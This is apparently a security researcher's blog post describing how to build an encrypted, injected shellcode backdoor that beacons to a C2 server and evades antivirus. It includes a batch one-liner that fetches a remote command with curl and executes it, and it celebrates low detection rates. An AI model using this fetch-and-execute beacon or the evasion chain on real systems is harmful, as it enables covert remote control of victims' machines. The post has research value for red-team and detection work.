Shellcode injection is one of the most widely used defence evasion techniques because the shellcode is injected into volatile memory, so few traces of the exploitation are left on disk. Apart from the injector itself, shellcode injection can be described as fileless or partially fileless malware. Since no files are dropped on the system, the chances of detection are low. However, shellcode generated by tools like msfvenom is highly detectable because its signatures are well known and regularly updated. But what if a custom shellcode is created and injected into memory? The signatures of custom shellcode are unknown to AV/EDR; moreover, shellcode consists of machine instructions that are very hard to analyse inside a victim process containing thousands of lines of machine code. The only likely detection point is the use of injection APIs, on which EDRs place hooks, but how to bypass API hooking is a separate discussion. A detailed analysis has been posted by my colleague, who used syscalls to bypass API hooking; it is provided below:
If a high-quality injector that uses syscalls to bypass API hooking injects a custom shellcode into the memory of a victim process, the detection rate is reduced to about 5 percent with current technology. In this blog we will focus on creating custom shellcode and show why custom shellcode is the epitome of defence evasion.
One problem that everyone faces while writing custom shellcode is that the process is very tedious: the position-independent code must be written in assembly language, the assembly must be linked into an executable, and only then can the shellcode be extracted from that binary. However, I came across a very good paper by hasherezade that uses Visual Studio to generate assembly from a C/C++ project and then turns that assembly into shellcode.
I will follow the methodology provided by hasherezade to create a custom position-independent backdoor that communicates with a command and control (C2) server over HTTPS to execute batch commands on the victim system. The shellcode will be a beacon-type payload that contacts the C2 every 10 seconds. The first requirement for creating custom shellcode is to write position-independent code, which means that the binary must not depend on external libraries or other dependencies. Luckily, hasherezade provides a header file in her GitHub repo that defines two main functions: get_module_by_name, for obtaining modules like kernel32.dll or user32.dll, and get_func_by_name, for resolving the addresses of functions present in the available modules. In my C/C++ code, I just have to include this header file and resolve two functions, LoadLibraryA and GetProcAddress, from the module kernel32.dll. Once these functions have been resolved, I can load any module using LoadLibraryA and call any function from the loaded module using GetProcAddress.
To produce position-independent code, all of the code must reside in a single section, such as the .text section of the generated binary, so that it can be extracted easily. This means that I cannot use string variables or char arrays directly, because they are stored in the .data section of the binary. I must either inline the strings or write stack-based strings, which are automatically placed in the .text section of the binary.
The next step is to obtain the addresses of LoadLibraryA and GetProcAddress by locating the kernel32.dll module in the code using the header file provided by hasherezade, peb_lookup.h.
Now that I have the addresses of LoadLibraryA and GetProcAddress stored in their respective variables, I can load any module that I want and call any API that I need. As with function call obfuscation, I am now resolving API imports indirectly. For executing commands on the system, I decided to resolve the WinExec API. Calling these APIs indirectly through their addresses requires their function definitions, which I looked up on the MSDN documentation pages from Microsoft.
This code is now completely position independent: it uses the LoadLibraryA, GetProcAddress, WinExec and Sleep APIs from the kernel32 module without relying on the import address table of the binary to resolve them. Since I have access to the WinExec API, I can use the command line to communicate with the server through a simple curl command for this PoC. On the server side, I added a PHP script on a public domain that takes as input the command that I want to execute on the system and saves that command on a subdomain, which my shellcode contacts with a GET request to fetch and execute the command on the victim PC.
This is a simple command and control server that takes a command as input and publishes it on a specific subdomain, which my shellcode contacts every 10 seconds to receive the command and execute it on the infected system. This makes it a beacon-type backdoor. I simply put WinExec in a while(true) loop with a Sleep of 10 seconds.
The batch command that I use to contact the subdomain and GET the command is provided below:
for /f “delims=” %i in (‘curl URL_HERE’) do set output=%i && %i
With my position-independent beacon backdoor code complete, I will now convert this C code into assembly and then convert the assembly into shellcode. I will use the Visual Studio developer command prompt to compile the C/C++ code into assembly language using MSVC. In the developer prompt, I entered the command that uses cl.exe to generate an assembly listing from a source file.
Now that the .asm file has been created, I need to resolve a few syntax errors and add the 16-byte stack alignment routine for x64 shellcode, which I took from PIC_Bindshell. I also removed the external dependencies and fixed some syntax errors, such as adding square brackets in mov rax, QWORD PTR gs:[96].
With the assembly generated from the C code, I will now link it into an executable with the AlignRSP proc as the start function, which first aligns the stack to 16 bytes and then calls the main function. If the generated binary executes without errors, the shellcode will also be in working condition. Let's check it out.
The command for generating the binary from the assembly listing is provided below:
"C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.30133\bin\Hostx64\x64\ml64.exe" backdoor.asm /link /entry:AlignRSP
The generated binary receives commands from the server and executes them on the victim system. I set the command "start calc" on the command and control server, so the binary fetched that command and popped open a calculator on the victim machine. The next step is to extract the shellcode from the .text section of this position-independent binary. To extract the shellcode I am using CFF Explorer Suite. It is very simple: open the binary in CFF Explorer, go to the .text section and copy all of the hex code.
To test the shellcode, I will inject it into a process using my own injector, called Donut, which stores the encrypted shellcode in its .data section and decrypts it before injecting it into the process. Encrypting the shellcode further reduces the chance of detection. To encrypt the shellcode, I created another custom tool, an AES shellcode encryptor, which takes a shellcode .bin file and encrypts it with a key. In the screenshot below, you can see the tool that encrypts the shellcode.
I will save this encrypted shellcode in my Donut injector. The code of the Donut injector is available on my GitHub page. This injector creates a process, injects the code into that process and starts it as a new thread. When the injector is executed, a calculator will pop open on the screen because I have set a command for starting the calculator on the command and control server. I will also change the command on the C2 server to open some other application, such as Paint, and see whether it is executed on the system.
As you can see, any command given on the command and control server is executed on the system. The code for the position-independent backdoor is available in my GitHub repository. A detailed video is also provided in the link below:
Conclusion
Windows Defender was not able to detect anything malicious when the custom shellcode was injected into processes. The conclusion of this article is that if custom shellcode is used with a high-quality injector, the detection rate of the malware becomes very low. Analysis of the malware is even harder if the custom shellcode is injected into a process and the injector then deletes itself. This is just a PoC proving the point that commands can be executed remotely on the victim system in a number of ways. The code could be further modified to return the output of each command to the C2 server, making it a more reliable backdoor. The injector has also been scanned on malware scanners like antiscan.me, and the result is very promising.
Author:
Shayan Ahmed Khan,
Reverse Engineer, Cytomate
REFERENCES: